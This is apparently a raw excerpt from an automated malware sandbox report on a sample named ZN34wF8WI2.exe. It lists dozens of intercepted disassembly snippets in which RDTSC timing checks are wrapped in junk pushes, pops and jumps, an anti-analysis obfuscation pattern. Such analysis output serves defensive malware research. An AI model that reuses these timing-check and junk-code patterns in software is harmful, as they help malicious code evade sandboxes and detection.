Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0421 second address: 71F0478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7620C9DE57h 0x00000009 sub ecx, 1465F66Eh 0x0000000f jmp 00007F7620C9DE59h 0x00000014 popfd 0x00000015 mov dx, si 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esi+04h], eax 0x0000001e jmp 00007F7620C9DE4Ah 0x00000023 mov dword ptr [esi+08h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0478 second address: 71F047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F047C second address: 71F0482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F05C2 second address: 71F05C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F05C8 second address: 71F05CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F05CC second address: 71F05D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F05D0 second address: 71F05DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F05DE second address: 71F063F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov ax, bx 0x0000000a mov bh, C8h 0x0000000c popad 0x0000000d popad 0x0000000e mov eax, dword ptr [ebx+60h] 0x00000011 pushad 0x00000012 jmp 00007F7620BAC886h 0x00000017 jmp 00007F7620BAC882h 0x0000001c popad 0x0000001d mov dword ptr [esi+24h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 call 00007F7620BAC87Dh 0x00000028 pop ecx 0x00000029 jmp 00007F7620BAC881h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F063F second address: 71F0688 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c jmp 00007F7620C9DE4Eh 0x00000011 mov dword ptr [esi+28h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F7620C9DE4Dh 0x0000001d jmp 00007F7620C9DE4Bh 0x00000022 popfd 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0688 second address: 71F06B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7620BAC885h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F06B5 second address: 71F070C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b pushad 0x0000000c mov ch, 2Eh 0x0000000e pushad 0x0000000f mov dl, 9Ch 0x00000011 mov dx, ax 0x00000014 popad 0x00000015 popad 0x00000016 mov ax, word ptr [ebx+6Ch] 0x0000001a pushad 0x0000001b mov ax, 5BADh 0x0000001f pushad 0x00000020 movzx esi, di 0x00000023 popad 0x00000024 popad 0x00000025 mov word ptr [esi+30h], ax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e pushfd 0x0000002f jmp 00007F7620C9DE56h 0x00000034 sbb ax, 8CA8h 0x00000039 jmp 00007F7620C9DE4Bh 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F070C second address: 71F0724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620BAC884h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0724 second address: 71F073F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7620C9DE4Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F073F second address: 71F0744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0744 second address: 71F0803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F7620C9DE57h 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov word ptr [esi+32h], ax 0x00000011 pushad 0x00000012 mov si, dx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F7620C9DE57h 0x0000001c xor si, DD5Eh 0x00000021 jmp 00007F7620C9DE59h 0x00000026 popfd 0x00000027 popad 0x00000028 popad 0x00000029 mov eax, dword ptr [ebx+0000008Ch] 0x0000002f pushad 0x00000030 mov cx, 1F1Fh 0x00000034 mov ax, 8E3Bh 0x00000038 popad 0x00000039 mov dword ptr [esi+34h], eax 0x0000003c pushad 0x0000003d mov ecx, 02F189B3h 0x00000042 popad 0x00000043 mov eax, dword ptr [ebx+18h] 0x00000046 pushad 0x00000047 movsx edx, si 0x0000004a mov edi, esi 0x0000004c popad 0x0000004d mov dword ptr [esi+38h], eax 0x00000050 pushad 0x00000051 mov ecx, 70F6C61Bh 0x00000056 call 00007F7620C9DE50h 0x0000005b push esi 0x0000005c pop edi 0x0000005d pop ecx 0x0000005e popad 0x0000005f mov eax, dword ptr [ebx+1Ch] 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F7620C9DE58h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0803 second address: 71F0809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0809 second address: 71F080D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F080D second address: 71F085A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F7620BAC883h 0x00000017 sub al, 0000003Eh 0x0000001a jmp 00007F7620BAC889h 0x0000001f popfd 0x00000020 mov bl, ch 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F085A second address: 71F0877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620C9DE59h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0877 second address: 71F087B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F087B second address: 71F088E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, FD75h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F088E second address: 71F089F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620BAC87Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F089F second address: 71F08C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+40h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7620C9DE4Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F08C8 second address: 71F08CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F08CE second address: 71F08D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F08D2 second address: 71F08D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F08D6 second address: 71F08F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7620C9DE51h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F08F9 second address: 71F08FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F09DC second address: 71F09FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F09FB second address: 71F09FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F09FF second address: 71F0A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0A05 second address: 71F0A14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620BAC87Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0A14 second address: 71F0A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0A2C second address: 71F0A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0A30 second address: 71F0A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0A34 second address: 71F0A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0A3A second address: 71F0ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3A2DCE2Ah 0x00000008 mov al, bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F7620C9DE58h 0x00000016 add ch, 00000018h 0x00000019 jmp 00007F7620C9DE4Bh 0x0000001e popfd 0x0000001f push ecx 0x00000020 mov edi, 6E85893Ah 0x00000025 pop edi 0x00000026 popad 0x00000027 test edi, edi 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F7620C9DE4Ch 0x00000030 add ch, 00000078h 0x00000033 jmp 00007F7620C9DE4Bh 0x00000038 popfd 0x00000039 mov ebx, esi 0x0000003b popad 0x0000003c js 00007F7690C6CA6Dh 0x00000042 pushad 0x00000043 mov ch, 87h 0x00000045 popad 0x00000046 mov eax, dword ptr [ebp-0Ch] 0x00000049 jmp 00007F7620C9DE56h 0x0000004e mov dword ptr [esi+04h], eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F7620C9DE57h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0ADB second address: 71F0AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0AE1 second address: 71F0B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e pushad 0x0000000f jmp 00007F7620C9DE54h 0x00000014 pushad 0x00000015 mov edx, esi 0x00000017 pushfd 0x00000018 jmp 00007F7620C9DE4Ch 0x0000001d sbb eax, 326D97F8h 0x00000023 jmp 00007F7620C9DE4Bh 0x00000028 popfd 0x00000029 popad 0x0000002a popad 0x0000002b push 00000001h 0x0000002d jmp 00007F7620C9DE56h 0x00000032 nop 0x00000033 jmp 00007F7620C9DE50h 0x00000038 push eax 0x00000039 pushad 0x0000003a mov bx, CE34h 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 popad 0x00000041 nop 0x00000042 jmp 00007F7620C9DE52h 0x00000047 lea eax, dword ptr [ebp-08h] 0x0000004a pushad 0x0000004b mov ebx, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f mov ebx, eax 0x00000051 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0B7D second address: 71F0B93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7620BAC87Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0B93 second address: 71F0B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0B97 second address: 71F0B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0B9D second address: 71F0BA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0BA3 second address: 71F0BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0BA7 second address: 71F0BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov dl, 21h 0x0000000c mov cx, 508Dh 0x00000010 popad 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7620C9DE4Fh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0BCA second address: 71F0BD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0BD0 second address: 71F0BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 71F0C74 second address: 71F0C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240BAF second address: 7240BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240BB3 second address: 7240BB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240BB9 second address: 7240BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7620BAC889h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240BD6 second address: 7240BFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ecx, ecx 0x0000000d pushad 0x0000000e mov ecx, edi 0x00000010 popad 0x00000011 inc ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240BFA second address: 7240BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240BFE second address: 7240C15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7240C15 second address: 7240C6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC889h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 shr eax, 1 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop esi 0x00000010 pushfd 0x00000011 jmp 00007F7620BAC87Fh 0x00000016 adc ecx, 7A68348Eh 0x0000001c jmp 00007F7620BAC889h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7220CB4 second address: 7220CC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7220CC3 second address: 7220CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7220CC9 second address: 7220CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230566 second address: 723056A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 723056A second address: 7230570 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230570 second address: 72305B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7620BAC882h 0x00000009 or cx, 9908h 0x0000000e jmp 00007F7620BAC87Bh 0x00000013 popfd 0x00000014 mov si, F37Fh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7620BAC880h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72305B1 second address: 72305F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 7F21A614h 0x00000008 push ebx 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F7620C9DE55h 0x00000015 add ch, FFFFFF86h 0x00000018 jmp 00007F7620C9DE51h 0x0000001d popfd 0x0000001e push esi 0x0000001f mov eax, ebx 0x00000021 pop edi 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 movzx ecx, dx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72305F8 second address: 72306D4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7620BAC887h 0x00000008 adc ecx, 46E8616Eh 0x0000000e jmp 00007F7620BAC889h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 movzx esi, di 0x00000019 popad 0x0000001a push esp 0x0000001b pushad 0x0000001c mov edi, ecx 0x0000001e jmp 00007F7620BAC882h 0x00000023 popad 0x00000024 mov dword ptr [esp], ebx 0x00000027 jmp 00007F7620BAC880h 0x0000002c xchg eax, esi 0x0000002d jmp 00007F7620BAC880h 0x00000032 push eax 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F7620BAC881h 0x0000003a jmp 00007F7620BAC87Bh 0x0000003f popfd 0x00000040 mov si, 489Fh 0x00000044 popad 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F7620BAC880h 0x0000004d sub esi, 5BABEC08h 0x00000053 jmp 00007F7620BAC87Bh 0x00000058 popfd 0x00000059 popad 0x0000005a mov esi, dword ptr [ebp+08h] 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F7620BAC881h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72306D4 second address: 72306DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72306DA second address: 72306DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72306DE second address: 72306E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72306E2 second address: 7230757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 00000000h 0x0000000d pushad 0x0000000e push eax 0x0000000f call 00007F7620BAC881h 0x00000014 pop esi 0x00000015 pop edi 0x00000016 pushfd 0x00000017 jmp 00007F7620BAC87Eh 0x0000001c adc cl, FFFFFFF8h 0x0000001f jmp 00007F7620BAC87Bh 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, edi 0x00000027 pushad 0x00000028 mov cl, 7Dh 0x0000002a mov bx, 89D4h 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 mov ebx, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007F7620BAC882h 0x0000003b or eax, 7E189588h 0x00000041 jmp 00007F7620BAC87Bh 0x00000046 popfd 0x00000047 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230757 second address: 723077E instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F7620C9DE57h 0x00000010 mov si, 33DFh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 723077E second address: 7230784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230784 second address: 7230788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230788 second address: 7230829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000001h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7620BAC889h 0x00000014 add ax, 94B6h 0x00000019 jmp 00007F7620BAC881h 0x0000001e popfd 0x0000001f movzx eax, bx 0x00000022 popad 0x00000023 lock cmpxchg dword ptr [esi], ecx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F7620BAC884h 0x0000002e sbb ch, 00000008h 0x00000031 jmp 00007F7620BAC87Bh 0x00000036 popfd 0x00000037 popad 0x00000038 mov ecx, eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F7620BAC87Bh 0x00000043 sub ax, 6F4Eh 0x00000048 jmp 00007F7620BAC889h 0x0000004d popfd 0x0000004e mov dx, si 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230829 second address: 723082F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 723082F second address: 7230833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
